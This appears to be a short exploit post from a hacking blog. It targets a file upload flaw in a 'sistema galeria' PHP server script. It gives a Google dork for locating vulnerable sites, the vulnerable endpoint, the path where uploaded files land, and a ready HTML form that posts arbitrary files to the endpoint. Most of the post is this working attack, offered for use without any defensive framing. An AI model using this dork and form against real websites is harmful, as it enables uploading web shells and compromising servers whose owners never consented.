# Author : sohaip-hackerDZ
# Google Dork: inurl:/sistema/galeria/server/
# Tested on: , Linux
# data : 2017-05-05
# Blog : http://www.tools-hack.com/
#################################################################################
# [!] Exploit : http://127.0.0.1/path/sistema/galeria/server/php/index.php
# [!] File Location : http:/127.0.0.1/path/sistema/galeria/server/php//FILE_NAME.php
#################################################################################
#CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/sistema/galeria/server/php/index.php" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
0 Response to "sistema galeria File Upload Vulnerability CSRF"
Post a Comment